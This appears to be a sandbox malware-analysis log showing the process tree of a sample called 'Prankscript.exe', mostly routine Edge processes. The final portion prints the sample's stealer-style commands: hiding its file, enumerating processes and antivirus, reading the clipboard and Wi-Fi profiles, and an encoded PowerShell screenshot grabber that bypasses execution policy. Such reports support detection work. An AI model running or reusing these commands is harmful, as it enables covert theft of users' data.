        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5348,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5344 /prefetch:14
        7⤵
        
        PID:3068
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=4148,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:1
        7⤵
        
        PID:1276
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5456,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:14
        7⤵
        
        PID:908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5692,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5708 /prefetch:1
        7⤵
        
        PID:4928
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5840,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:12
        7⤵
        
        PID:2624
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5880,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5944 /prefetch:14
        7⤵
        
        PID:484
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5888,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5972 /prefetch:14
        7⤵
        
        PID:2260
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3872,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:14
        7⤵
        
        PID:4196
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
        
        cookie_exporter.exe --cookie-json=1132
        8⤵
        
        PID:2008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3896,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5568 /prefetch:14
        7⤵
        
        PID:132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3896,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5568 /prefetch:14
        7⤵
        
        PID:1224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6848,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=6840 /prefetch:14
        7⤵
        
        PID:3720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6840,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=6936 /prefetch:14
        7⤵
        
        PID:4616
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3928,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5548 /prefetch:14
        7⤵
        
        PID:4872
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5592,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:14
        7⤵
        
        PID:4808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7008,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=4156 /prefetch:14
        7⤵
        
        PID:940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7316,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=7328 /prefetch:14
        7⤵
        
        PID:5048
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5232,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=7480 /prefetch:14
        7⤵
        
        PID:4836
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6712,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=3888 /prefetch:14
        7⤵
        
        PID:1028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=728,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=4488 /prefetch:14
        7⤵
        
        PID:4100
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5504,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:14
        7⤵
        
        PID:3712
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=4592 /prefetch:14
        7⤵
        
        PID:2636
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4572,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=6064 /prefetch:14
        7⤵
        
        PID:1904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7536,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:14
        7⤵
        Modifies registry class
        
        PID:3884
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6176,i,2867555710003505963,10503717704370868870,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:14
        7⤵
        
        PID:4428
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
        7⤵
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        
        PID:3404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x25c,0x7ff96434f208,0x7ff96434f214,0x7ff96434f220
        8⤵
        
        PID:3280
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2104,i,4814125611970466900,15585073975219337448,262144 --variations-seed-version --mojo-platform-channel-handle=2100 /prefetch:2
        8⤵
        
        PID:4428
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1664,i,4814125611970466900,15585073975219337448,262144 --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:11
        8⤵
        
        PID:2564
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2452,i,4814125611970466900,15585073975219337448,262144 --variations-seed-version --mojo-platform-channel-handle=2480 /prefetch:13
        8⤵
        
        PID:5048
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4280,i,4814125611970466900,15585073975219337448,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:14
        8⤵
        
        PID:5072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4280,i,4814125611970466900,15585073975219337448,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:14
        8⤵
        
        PID:3988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4604,i,4814125611970466900,15585073975219337448,262144 --variations-seed-version --mojo-platform-channel-handle=4580 /prefetch:14
        8⤵
        
        PID:4060
      - C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        6⤵
        
        PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2360
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
      4⤵
      Views/modifies file attributes
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3588
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1276
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3564
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:5012
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoA